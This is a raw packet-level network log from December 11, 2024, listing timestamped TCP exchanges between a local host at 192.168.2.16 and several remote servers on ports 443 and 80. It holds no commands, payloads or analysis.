                                                                              Dec 11, 2024 15:19:40.730082989 CET44349713151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:40.730171919 CET49713443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.730180979 CET44349713151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:40.730226994 CET49713443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.730551004 CET49713443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.730568886 CET44349713151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:40.872378111 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.872425079 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:40.872520924 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.872714996 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:40.872731924 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:41.187048912 CET4968080192.168.2.16192.229.211.108
                                                                              Dec 11, 2024 15:19:41.510190010 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.510468006 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.510493994 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.511512995 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.511580944 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.511852026 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.511923075 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.511985064 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.511991978 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.553040981 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.970577955 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.970668077 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.970695019 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.970727921 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.970741034 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.970768929 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.970784903 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.979042053 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.979156971 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.979181051 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.985404968 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:41.985510111 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:41.985527992 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.033106089 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.033118963 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.081110954 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.090789080 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.145102024 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.145118952 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.155689955 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.156187057 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.156256914 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.157334089 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.157434940 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.157772064 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.157846928 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.157984018 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.158001900 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.162590027 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.162677050 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.162707090 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.168322086 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.168397903 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.168414116 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.175654888 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.175729990 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.175736904 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.183226109 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.183284044 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.183293104 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.191098928 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.191154957 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.191163063 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.202331066 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.202609062 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.202625990 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.203658104 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.203733921 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.204097986 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.204165936 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.204483032 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.204494953 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.206235886 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.206291914 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.206298113 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.206309080 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.206348896 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.209168911 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.213771105 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.221543074 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.221569061 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.221596956 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.221621037 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.221676111 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.229146004 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.236500978 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.236556053 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.236567974 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.243221045 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.243269920 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.243284941 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.250896931 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.250921011 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.250946999 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.250957966 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.251005888 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.251225948 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.251275063 CET44349716104.18.94.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.251324892 CET49716443192.168.2.16104.18.94.41
                                                                              Dec 11, 2024 15:19:42.257038116 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.393304110 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.393347025 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.393409967 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.393645048 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.393651962 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.408162117 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.408190012 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.408277035 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.408437967 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:42.408447981 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:42.599041939 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.599096060 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.599119902 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.599155903 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.599306107 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.599306107 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.599380970 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.607481003 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.607553005 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.607564926 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.615650892 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.615710974 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.615719080 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.624480963 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.624548912 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.624562979 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.650047064 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.650121927 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.650163889 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.650182009 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.650194883 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.650243998 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.650252104 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.657928944 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.657988071 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.657995939 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.672210932 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.672276974 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.672441959 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.672529936 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.672538042 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.681024075 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.681082010 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.681088924 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.720165014 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.720231056 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.736041069 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.768153906 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.769721985 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.816073895 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.816097021 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832287073 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832298040 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832329035 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832345963 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832356930 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832448959 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.832448959 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.832448959 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.832480907 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.832530022 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.845125914 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.845195055 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.845213890 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.852660894 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.852727890 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.852746010 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.860249996 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.860320091 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.860347033 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.867805958 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.867871046 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.867897034 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.875374079 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.875442028 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.875467062 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.883243084 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.883328915 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.883354902 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.890734911 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.890806913 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.890834093 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.898330927 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.898431063 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.898453951 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.911634922 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.911732912 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.911757946 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.911776066 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.911953926 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.918071985 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.923980951 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.924053907 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.924062014 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.929642916 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.929719925 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.929728031 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.929991961 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.930200100 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.930394888 CET49718443192.168.2.16104.17.25.14
                                                                              Dec 11, 2024 15:19:42.930408955 CET44349718104.17.25.14192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983560085 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983572960 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983623028 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983642101 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983777046 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.983777046 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:42.983850956 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:42.983926058 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.011387110 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.011400938 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.011451960 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.011528969 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.011528969 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.011601925 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.011692047 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.041701078 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.041734934 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.041805029 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.041883945 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.041925907 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.042327881 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.055074930 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.055159092 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.055190086 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.055234909 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.057142973 CET49719443192.168.2.16151.101.2.137
                                                                              Dec 11, 2024 15:19:43.057183981 CET44349719151.101.2.137192.168.2.16
                                                                              Dec 11, 2024 15:19:43.598031998 CET4968080192.168.2.16192.229.211.108
                                                                              Dec 11, 2024 15:19:43.603082895 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.603349924 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.603372097 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.604433060 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.604506016 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.604990959 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.605062008 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.605087042 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.619810104 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.620064974 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.620080948 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.621057987 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.621131897 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.621411085 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.621471882 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.621625900 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.621638060 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.651331902 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.653316975 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.653336048 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:43.662061930 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.694050074 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:43.934061050 CET49678443192.168.2.1620.189.173.10
                                                                              Dec 11, 2024 15:19:44.047111988 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.047172070 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.047221899 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.047226906 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.047259092 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.047275066 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.047305107 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.047343969 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.047353029 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.057009935 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.057059050 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.057091951 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.064465046 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.064555883 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.064588070 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.064610958 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.064621925 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.064656019 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.065145016 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.065188885 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.065221071 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.076462030 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.079334974 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.079391003 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.079400063 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.087097883 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.087162018 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.087169886 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.089268923 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.089343071 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.089416981 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.089643002 CET49722443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.089660883 CET44349722104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.095812082 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.095870972 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.095877886 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.110044956 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.138369083 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.166915894 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.221082926 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.238670111 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.241441965 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.241525888 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.241568089 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.256707907 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.257059097 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.257108927 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.257121086 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.257143974 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.257184982 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.260489941 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.260569096 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.260587931 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.265216112 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.267966032 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.268035889 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.268045902 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.273294926 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.273351908 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.273399115 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.275846958 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.275911093 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.275919914 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.281683922 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.281733036 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.281770945 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.289639950 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.289705038 CET49720443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.289756060 CET44349720104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.290587902 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.290638924 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.290680885 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.290719032 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.290766001 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.290894032 CET49721443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.290915012 CET44349721104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.294147015 CET49723443192.168.2.16104.18.95.41
                                                                              Dec 11, 2024 15:19:44.294177055 CET44349723104.18.95.41192.168.2.16
                                                                              Dec 11, 2024 15:19:44.294251919 CET49723443192.168.2.16104.18.95.41
